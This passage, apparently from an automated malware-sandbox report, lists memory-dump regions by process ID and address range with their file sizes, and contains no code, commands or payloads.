                                                    • memory/468-118-0x0000000000000000-mapping.dmp
                                                    • memory/524-115-0x0000000000000000-mapping.dmp
                                                    • memory/572-126-0x0000000000000000-mapping.dmp
                                                    • memory/596-134-0x0000000000000000-mapping.dmp
                                                    • memory/676-110-0x0000000000000000-mapping.dmp
                                                    • memory/748-60-0x00000000753E1000-0x00000000753E3000-memory.dmp
                                                      Filesize

                                                      8KB

                                                    • memory/868-359-0x0000000000A80000-0x0000000000ACC000-memory.dmp
                                                      Filesize

                                                      304KB

                                                    • memory/868-360-0x0000000000F30000-0x0000000000FA1000-memory.dmp
                                                      Filesize

                                                      452KB

                                                    • memory/868-184-0x00000000017E0000-0x0000000001851000-memory.dmp
                                                      Filesize

                                                      452KB

                                                    • memory/868-183-0x0000000000FB0000-0x0000000000FFC000-memory.dmp
                                                      Filesize

                                                      304KB

                                                    • memory/892-240-0x0000000000000000-mapping.dmp
                                                    • memory/896-314-0x00000000008F0000-0x000000000098D000-memory.dmp
                                                      Filesize

                                                      628KB

                                                    • memory/896-239-0x0000000000000000-mapping.dmp
                                                    • memory/896-316-0x0000000000400000-0x00000000008EC000-memory.dmp
                                                      Filesize

                                                      4.9MB

                                                    • memory/1048-303-0x0000000001C50000-0x0000000001C6B000-memory.dmp
                                                      Filesize

                                                      108KB

                                                    • memory/1048-188-0x00000000004B0000-0x0000000000521000-memory.dmp
                                                      Filesize

                                                      452KB

                                                    • memory/1048-304-0x0000000002F10000-0x0000000003016000-memory.dmp
                                                      Filesize

                                                      1.0MB

                                                    • memory/1048-186-0x00000000FFDA246C-mapping.dmp
                                                    • memory/1112-158-0x0000000000000000-mapping.dmp
                                                    • memory/1120-131-0x0000000000000000-mapping.dmp
                                                    • memory/1176-169-0x00000000001D0000-0x00000000001D9000-memory.dmp
                                                      Filesize

                                                      36KB

                                                    • memory/1176-173-0x0000000000400000-0x0000000000896000-memory.dmp
                                                      Filesize

                                                      4.6MB

                                                    • memory/1176-124-0x0000000000000000-mapping.dmp
                                                    • memory/1184-108-0x0000000000000000-mapping.dmp
                                                    • memory/1300-114-0x0000000000000000-mapping.dmp
                                                    • memory/1356-189-0x000007FEC1870000-0x000007FEC187A000-memory.dmp
                                                      Filesize

                                                      40KB

                                                    • memory/1356-181-0x0000000003F40000-0x0000000003F55000-memory.dmp
                                                      Filesize

                                                      84KB

                                                    • memory/1356-187-0x000007FEF5CF0000-0x000007FEF5E33000-memory.dmp
                                                      Filesize

                                                      1.3MB

                                                    • memory/1384-315-0x0000000000000000-mapping.dmp
                                                    • memory/1500-358-0x00000000002A0000-0x00000000002A1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1528-334-0x0000000002C40000-0x0000000003566000-memory.dmp
                                                      Filesize

                                                      9.1MB

                                                    • memory/1528-335-0x0000000000400000-0x0000000000D41000-memory.dmp
                                                      Filesize

                                                      9.3MB

                                                    • memory/1528-238-0x0000000000000000-mapping.dmp
                                                    • memory/1540-112-0x0000000000000000-mapping.dmp
                                                    • memory/1572-276-0x0000000000000000-mapping.dmp
                                                    • memory/1608-155-0x0000000001130000-0x0000000001131000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1608-147-0x0000000000000000-mapping.dmp
                                                    • memory/1608-163-0x000000001B060000-0x000000001B062000-memory.dmp
                                                      Filesize

                                                      8KB

                                                    • memory/1700-167-0x0000000000400000-0x00000000008F2000-memory.dmp
                                                      Filesize

                                                      4.9MB

                                                    • memory/1700-166-0x00000000021E0000-0x000000000227D000-memory.dmp
                                                      Filesize

                                                      628KB

                                                    • memory/1700-129-0x0000000000000000-mapping.dmp
                                                    • memory/1704-107-0x0000000000000000-mapping.dmp
                                                    • memory/1752-177-0x0000000000000000-mapping.dmp
                                                    • memory/1752-190-0x0000000000C70000-0x0000000000C71000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1776-278-0x0000000000000000-mapping.dmp
                                                    • memory/1848-247-0x0000000000000000-mapping.dmp
                                                    • memory/1860-329-0x00000000024A0000-0x00000000024A1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/1860-296-0x0000000000417DFA-mapping.dmp
                                                    • memory/1908-99-0x0000000000400000-0x000000000051D000-memory.dmp
                                                      Filesize

                                                      1.1MB

                                                    • memory/1908-72-0x0000000000000000-mapping.dmp
                                                    • memory/1908-93-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                      Filesize

                                                      1.5MB

                                                    • memory/1908-95-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                      Filesize

                                                      152KB

                                                    • memory/1908-90-0x0000000064940000-0x0000000064959000-memory.dmp
                                                      Filesize

                                                      100KB

                                                    • memory/1908-91-0x0000000064940000-0x0000000064959000-memory.dmp
                                                      Filesize

                                                      100KB

                                                    • memory/1908-94-0x0000000064940000-0x0000000064959000-memory.dmp
                                                      Filesize

                                                      100KB

                                                    • memory/1908-98-0x0000000000400000-0x000000000051D000-memory.dmp
                                                      Filesize

                                                      1.1MB

                                                    • memory/1908-92-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                      Filesize

                                                      1.5MB

                                                    • memory/1908-100-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                      Filesize

                                                      572KB

                                                    • memory/1908-97-0x0000000064940000-0x0000000064959000-memory.dmp
                                                      Filesize

                                                      100KB

                                                    • memory/1908-96-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                      Filesize

                                                      152KB

                                                    • memory/1908-89-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                      Filesize

                                                      572KB

                                                    • memory/1944-283-0x0000000000000000-mapping.dmp
                                                    • memory/1980-185-0x0000000000280000-0x00000000002DD000-memory.dmp
                                                      Filesize

                                                      372KB

                                                    • memory/1980-179-0x0000000000000000-mapping.dmp
                                                    • memory/1980-182-0x00000000009A0000-0x0000000000AA1000-memory.dmp
                                                      Filesize

                                                      1.0MB

                                                    • memory/2020-62-0x0000000000000000-mapping.dmp
                                                    • memory/2040-333-0x00000000003A0000-0x00000000003A1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/2040-172-0x0000000000000000-mapping.dmp
                                                    • memory/2040-332-0x0000000000940000-0x0000000000941000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/2040-293-0x0000000000000000-mapping.dmp
                                                    • memory/2080-253-0x0000000000000000-mapping.dmp
                                                    • memory/2084-286-0x0000000000000000-mapping.dmp
                                                    • memory/2108-192-0x0000000000000000-mapping.dmp
                                                    • memory/2176-277-0x0000000000000000-mapping.dmp
                                                    • memory/2180-228-0x0000000004A40000-0x0000000004A41000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/2180-218-0x0000000001080000-0x0000000001081000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/2180-194-0x0000000000000000-mapping.dmp
                                                    • memory/2196-196-0x0000000000000000-mapping.dmp
                                                    • memory/2204-195-0x0000000000000000-mapping.dmp
                                                    • memory/2216-311-0x0000000000230000-0x0000000000231000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/2216-252-0x0000000000000000-mapping.dmp
                                                    • memory/2224-269-0x00000000054B0000-0x00000000054B1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/2224-199-0x0000000000000000-mapping.dmp
                                                    • memory/2224-210-0x00000000012D0000-0x00000000012D1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/2232-197-0x0000000000000000-mapping.dmp
                                                    • memory/2240-200-0x0000000000000000-mapping.dmp
                                                    • memory/2248-198-0x0000000000000000-mapping.dmp
                                                    • memory/2272-201-0x0000000000000000-mapping.dmp
                                                    • memory/2272-203-0x000007FEFBEF1000-0x000007FEFBEF3000-memory.dmp
                                                      Filesize

                                                      8KB

                                                    • memory/2280-250-0x0000000000000000-mapping.dmp
                                                    • memory/2288-260-0x0000000002110000-0x000000000217F000-memory.dmp
                                                      Filesize

                                                      444KB

                                                    • memory/2288-202-0x0000000000000000-mapping.dmp
                                                    • memory/2288-261-0x0000000003030000-0x0000000003101000-memory.dmp
                                                      Filesize

                                                      836KB

                                                    • memory/2352-262-0x0000000000400000-0x000000000041E000-memory.dmp
                                                      Filesize

                                                      120KB

                                                    • memory/2352-263-0x0000000000417E1A-mapping.dmp
                                                    • memory/2352-307-0x0000000000820000-0x0000000000821000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/2364-256-0x0000000000000000-mapping.dmp
                                                    • memory/2408-211-0x0000000000400000-0x0000000000495000-memory.dmp
                                                      Filesize

                                                      596KB

                                                    • memory/2408-214-0x000000000044003F-mapping.dmp
                                                    • memory/2408-223-0x0000000000400000-0x0000000000495000-memory.dmp
                                                      Filesize

                                                      596KB

                                                    • memory/2480-215-0x0000000000000000-mapping.dmp
                                                    • memory/2540-298-0x0000000000FB0000-0x0000000000FB1000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/2540-267-0x0000000000417DEA-mapping.dmp
                                                    • memory/2556-305-0x0000000000000000-mapping.dmp
                                                    • memory/2568-219-0x0000000000000000-mapping.dmp
                                                    • memory/2600-292-0x0000000002511000-0x0000000002512000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/2600-309-0x0000000002514000-0x0000000002516000-memory.dmp
                                                      Filesize

                                                      8KB

                                                    • memory/2600-297-0x0000000002512000-0x0000000002513000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/2600-279-0x0000000000240000-0x000000000026F000-memory.dmp
                                                      Filesize

                                                      188KB

                                                    • memory/2600-291-0x0000000000400000-0x00000000008A8000-memory.dmp
                                                      Filesize

                                                      4.7MB

                                                    • memory/2600-221-0x0000000000000000-mapping.dmp
                                                    • memory/2600-300-0x0000000002513000-0x0000000002514000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/2620-354-0x0000000000400000-0x00000000009BE000-memory.dmp
                                                      Filesize

                                                      5.7MB

                                                    • memory/2620-352-0x0000000000250000-0x000000000027E000-memory.dmp
                                                      Filesize

                                                      184KB

                                                    • memory/2620-295-0x0000000000000000-mapping.dmp
                                                    • memory/2660-235-0x0000000004B70000-0x0000000004B71000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/2660-225-0x0000000000000000-mapping.dmp
                                                    • memory/2660-231-0x0000000001320000-0x0000000001321000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/2804-226-0x0000000000000000-mapping.dmp
                                                    • memory/2816-227-0x0000000000000000-mapping.dmp
                                                    • memory/2924-229-0x0000000000000000-mapping.dmp
                                                    • memory/2952-281-0x0000000000000000-mapping.dmp
                                                    • memory/2952-330-0x0000000000540000-0x0000000000541000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/3012-299-0x0000000000000000-mapping.dmp
                                                    • memory/3028-271-0x0000000004A70000-0x0000000004A71000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/3028-233-0x0000000000000000-mapping.dmp
                                                    • memory/3028-264-0x0000000000390000-0x0000000000391000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/3040-234-0x0000000000000000-mapping.dmp
                                                    • memory/3040-251-0x0000000000E80000-0x0000000000E81000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/3040-268-0x0000000005490000-0x0000000005491000-memory.dmp
                                                      Filesize

                                                      4KB

                                                    • memory/3056-280-0x0000000000000000-mapping.dmp
                                                    • memory/3064-237-0x0000000000000000-mapping.dmp
                                                    • memory/3064-337-0x00000000002A0000-0x00000000002E7000-memory.dmp
                                                      Filesize

                                                      284KB

                                                    • memory/3300-357-0x0000000000700000-0x000000000075D000-memory.dmp
                                                      Filesize

                                                      372KB

                                                    • memory/3300-356-0x00000000005F0000-0x00000000006F1000-memory.dmp
                                                      Filesize

                                                      1.0MB

                                                    • memory/3948-368-0x0000000002540000-0x0000000002541000-memory.dmp
                                                      Filesize

                                                      4KB